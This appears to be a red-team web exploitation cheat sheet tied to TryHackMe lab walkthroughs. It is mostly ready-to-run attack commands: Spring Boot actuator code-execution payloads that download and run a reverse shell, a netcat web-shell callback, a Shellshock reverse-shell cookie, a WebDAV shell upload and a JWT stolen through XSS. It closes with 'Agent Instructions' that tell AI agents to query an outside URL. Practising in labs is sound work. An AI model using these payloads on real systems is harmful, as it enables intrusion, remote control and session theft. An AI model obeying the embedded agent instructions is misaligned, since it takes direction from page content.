## Spring Boot
### Reverse Shell
**Examples**
[Spring](/red-team/walkthroughs/tryhackme/spring.md#initial-shell)
**Exploit:**
**Kali #1**
```
tcpdump -i ens5 icmp
```
Below example checks the IP which may not be necessary.
**Kali #2**
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'ping -c 5 $KALI\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
**reverse.sh**
```
bash -c "bash -i >& /dev/tcp/$KALI/1337 0>&1"
```
**Kali #1**
```
python3 -m http.server 81
```
**Kali #2**
```
nc -lvnp 1337
```
Download payload
**Kali #3**
```
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'wget http://$KALI:81/reverse.sh -O /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
```
Run payload
**Kali #3**
```
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'bash /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
```
## See CMDS from page source
**Examples**
[Jack-of-All-Trades](/red-team/walkthroughs/tryhackme/jack-of-all-trades.md)
Sometimes you can't see the results of the output from the page so you need to check the page source.
```
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami
```
**Kali**
```
nc -lvnp 1337
```
**Browser**
```
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337
```
## CGI-Bin
### Scanning
**Examples**
[0day](/red-team/walkthroughs/tryhackme/0day.md)
See if a cgi-bin folder appears in the inital scans, if it does start scanning that direcoty for .cgi files.
**Kali**
```
gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi
```
### Shell
**Examples**
[0day](/red-team/walkthroughs/tryhackme/0day.md)
**Link:**
**Kali#1**
```
nc -lvnp 4242
```
**Kali #2**
```
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi
```
## Change request type
**Examples**
[Mother's Secret](/red-team/walkthroughs/tryhackme/mothers-secret.md)
Change the request to POST and add everything else highlighted, we see the status message now changes.
Now we change the yaml to the the emergency override code mentioned in the room.
Now we perform the same steps again except this time for the api/nostromo route and the new file we discovered.
## **WebDav Cadvaer**
If server is using WebDav and we have credentials we can login and upload files.
**Examples**
[Dav](/red-team/walkthroughs/tryhackme/dav.md)
**Kali**
cadaver http://$VICTIM:80/webdav
Username: wampp
Password: xampp
dav:/webdav/> put shell.php shell.php
## XXE Injection
### Exploiting XXE - In-Band
**Examples**
[XXE Injection](/red-team/walkthroughs/tryhackme/xxe-injection.md#exploiting-xxe-in-band)
### Exploiting XXE - Out-of-Band
**Examples**
[XXE Injection](/red-team/walkthroughs/tryhackme/xxe-injection.md#exploiting-xxe-out-of-band)
### SSRF + XXE
**Examples**
[XXE Injection](/red-team/walkthroughs/tryhackme/xxe-injection.md#ssrf--xxe)
## XML-RPC
### Check if it is enabled
**Examples**
[Retro](/red-team/walkthroughs/tryhackme/retro.md)
wpscan or a scan maybe able identified that xmlrpc.php exists, if it is check if it is enabled.
```
POST /$SITE/xmlrpc.php HTTP/1.1
Host: $VICTIM
Content-Length: 91
system.listMethods
```
### View Files
**Examples**
[Mustacchio](/red-team/walkthroughs/tryhackme/mustacchio.md)[battery](/red-team/walkthroughs/tryhackme/battery.md#xee-read-files)
**Input**
```
]>
Joe HamdBarry Clad&xxe;
```
Base64 encode the file
```
]>
&test;
```
## XSS
### Reflected XSS
**Examples**
[XSS](/red-team/walkthroughs/tryhackme/xss.md#reflected-xss)
[XSS](/red-team/walkthroughs/tryhackme/xss.md#cve-2023-38501-vulnerable-web-application-1)
### Stored XSS
**Examples**
[XSS](/red-team/walkthroughs/tryhackme/xss.md#reflected-xss)
[XSS](/red-team/walkthroughs/tryhackme/xss.md#cve-2021-38757-vulnerable-web-application-2)
### Dom-Based XSS
**Examples**
[XSS](/red-team/walkthroughs/tryhackme/xss.md#dom-based-xss)
### XSS - Steal JVT
**Examples**
[The Marketplace](/red-team/walkthroughs/tryhackme/the-marketplace.md#xss-steal-jvt)
I tried updating the token it didn't work
Next we're going to try to steal the JWT from another user.
**Kali**
```
nc -lvnp 4444
```
**Browser**
```
```
This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button
we got a token from a user that isn't us
We can see it is from Michael who is an admin.
Sent again but this time just forwarded the request so we could see what that script was doing
The script was printing the flag
This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.
**Brower cookie**
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
```
## CSRF
**Examples**
[CSRF](/red-team/walkthroughs/tryhackme/csrf.md)
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://jeffgthompsons-organization.gitbook.io/red-team/methodologies-and-resources/cheat-sheets/web.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.